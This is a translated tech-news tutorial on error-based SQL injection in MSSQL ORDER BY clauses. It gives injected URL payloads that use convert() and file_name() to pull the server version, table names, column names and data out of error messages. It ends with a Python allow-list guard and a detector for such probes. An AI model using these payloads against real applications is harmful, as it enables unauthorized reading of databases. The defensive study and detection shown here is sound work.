
How to understand the SQL injection Technology based on MSSQL "order by" statement error reporting

2025-03-15 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

In this issue, the editor explains the SQL injection technique based on error reporting in MSSQL "order by" statements. The article is rich in content and analyzes the topic from a professional point of view; I hope you will get something out of it.

The SQL injection vulnerability we are going to exploit occurs when user-supplied data is placed into the "Order By" clause of an MSSQL query, and the application returns the SQL Server error message whenever the resulting query contains a syntax error.

If the user-supplied data is passed into the SQL query as a column name in the "Order By" clause, the conventional "error-based SQL injection" techniques will not work.

Because SQL Server enforces a predefined set of security rules on SQL queries, the conventional "error-based SQL injection" techniques cannot be used to exploit this kind of SQL injection vulnerability in an application.

However, the user can also place a function call after the "Order By" clause. Some SQL Server functions execute the query passed in their parameter and then try to perform a particular operation on its result, throwing an error when that operation fails. If we target these functions, the error they raise will expose the result of the injected SQL query. That is the idea behind this technique.

Vulnerability exploitation

Let's start with the functions that can be used for error-based SQL injection attacks.

In fact, only a few SQL Server functions meet our requirements: they execute the SQL query given in their parameter, perform a specified operation on the query result, and return the query result inside an error message.

convert() is one function that meets these requirements, and it is often used in error-based SQL injection attacks because it converts its second parameter to the data type specified by its first parameter.

For example, in convert(int,@@version) the convert function first evaluates the SQL query given in its second parameter and then attempts to convert the result to type int. Because the result of this query is of type varchar, the requested conversion cannot be performed, so convert throws a SQL Server error message stating that the "SQL query result" cannot be converted to "int". The attacker reads the query result from that message.

The functions that meet the above requirements are listed below:

convert()
file_name()
db_name()
col_name()
filegroup_name()
object_name()
schema_name()
type_name()
cast()

Demo:

Suppose there is a URL with a SQL injection vulnerability: the value of a parameter named "order", supplied by the user in an HTTP GET request, is passed straight into the SQL query. The URL looks like this:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=column_name

The application reads the user-supplied value of the GET parameter "order" and generates an SQL query like this:

select table_name,column_name from information_schema.columns order by column_name

convert() function

Query SQL server version

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,@@version)

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by convert(int,@@version)

Extract the table name of the current database

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,(select top (1) table_name from information_schema.tables))

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by convert(int,(select top (1) table_name from information_schema.tables))

Extract column names from the table

When extracting column names, we use cast() to specify the table whose column names should be returned. Note that the table name is supplied in hexadecimal form (0x7370745f66616c6c6261636b5f6462 is the string 'spt_fallback_db').

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,(select top (1) column_name from information_schema.columns where table_name=cast(0x7370745f66616c6c6261636b5f6462 as varchar)))

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by convert(int,(select top (1) column_name from information_schema.columns where table_name=cast(0x7370745f66616c6c6261636b5f6462 as varchar)))

Extract column data from a table

Extracting data from the columns of a table is not complicated: just specify the column name and the table name in the SQL query. In this case the column is 'xserver_name' and the table is 'spt_fallback_db'.

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,(select top (1) xserver_name from spt_fallback_db))

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by convert(int,(select top (1) xserver_name from spt_fallback_db))

file_name() function

Query SQL server version

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=file_name(@@version)

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by file_name(@@version)

Extract the table name of the current database

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=file_name((select top (1) table_name from information_schema.tables))

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by file_name((select top (1) table_name from information_schema.tables))

Extract column names from the table

As with convert(), we use cast() to specify the table whose column names should be returned, and the table name is again supplied in hexadecimal form (0x7370745f66616c6c6261636b5f6462 is the string 'spt_fallback_db').

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=file_name((select top (1) column_name from information_schema.columns where table_name=cast(0x7370745f66616c6c6261636b5f6462 as varchar)))

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by file_name((select top (1) column_name from information_schema.columns where table_name=cast(0x7370745f66616c6c6261636b5f6462 as varchar)))

Extract column data from a table

Extracting column data from a table is simple: specify the column name and the table name in the SQL query. In this case the column is 'xserver_name' and the table is 'spt_fallback_db'.

URL after injecting relevant commands:

http://vulnerable_webapp/vulnerable.asp?data=yes&order=file_name((select top (1) xserver_name from spt_fallback_db))

The query actually executed in the background:

select table_name,column_name from information_schema.columns order by file_name((select top (1) xserver_name from spt_fallback_db))
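As an added example (not code from the original article), here is how a defender handles the "order" parameter the demo describes: the vulnerable concatenation beside an allow-list guard, which is the mitigation because ORDER BY identifiers cannot be bound as query parameters, and a detector that flags requests whose "order" value calls one of the functions listed above. The function names, the allow-list and the sample URLs are assumptions built from the article's demo.

```python
import re
from urllib.parse import parse_qs, urlsplit
# ORDER BY identifiers cannot be bound as query parameters, so the safe
# pattern is an allow-list: user input selects a known column, nothing else.
ALLOWED_ORDER_COLUMNS = {"table_name", "column_name"}
# Functions the article lists as leaking a subquery result via a SQL Server error.
ERROR_FUNCS = ("convert", "cast", "file_name", "db_name", "col_name",
               "filegroup_name", "object_name", "schema_name", "type_name")
_FUNC_CALL = re.compile(r"\b(?:%s)\s*\(" % "|".join(ERROR_FUNCS), re.I)
BASE = "select table_name,column_name from information_schema.columns order by "

def vulnerable_query(order):
    """The article's pattern: raw concatenation into ORDER BY (contrast only)."""
    return BASE + order

def validate_order(order):
    """Normalised 'column direction' for an allow-listed value, else None."""
    parts = order.strip().lower().split()
    if not parts or parts[0] not in ALLOWED_ORDER_COLUMNS:
        return None
    if len(parts) > 2 or (len(parts) == 2 and parts[1] not in ("asc", "desc")):
        return None
    return parts[0] + (" " + parts[1] if len(parts) == 2 else " asc")

def safe_query(order):
    """Hardened form: only the validated clause is substituted; anything else
    raises, so attacker-controlled text never reaches the SQL statement."""
    clause = validate_order(order)
    if clause is None:
        raise ValueError("invalid order parameter")
    return BASE + clause

def flag_request(url):
    """Return the 'order' value if it looks like an error-based probe, else None."""
    order = parse_qs(urlsplit(url).query).get("order", [""])[0]
    return order if (_FUNC_CALL.search(order) or "@@" in order) else None

# Constructed sample requests, including the article's own payloads (URL-encoded).
SAMPLE_URLS = [
    "http://vulnerable_webapp/vulnerable.asp?data=yes&order=column_name",
    "http://vulnerable_webapp/vulnerable.asp?data=yes&order=convert(int,@@version)",
    "http://vulnerable_webapp/vulnerable.asp?data=yes&order=file_name(@@version)",
    "http://vulnerable_webapp/vulnerable.asp?data=yes&order=CONVERT(int,(select+top+(1)"
    "+table_name+from+information_schema.tables))",
]

def suspicious_requests(urls=SAMPLE_URLS):
    """Detection pass over request URLs, e.g. pulled from an IIS access log."""
    return [u for u in urls if flag_request(u) is not None]
```

The detector is a coarse first filter for log review: a legitimate "order" value from the allow-list never contains a function call or "@@", so any hit deserves a look at the application's error responses for that request.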

The above is the editor's explanation of the SQL injection technique based on error reporting in MSSQL "order by" statements. If you have similar questions, you may find the analysis above useful. If you want to learn more, you are welcome to follow the industry information channel.
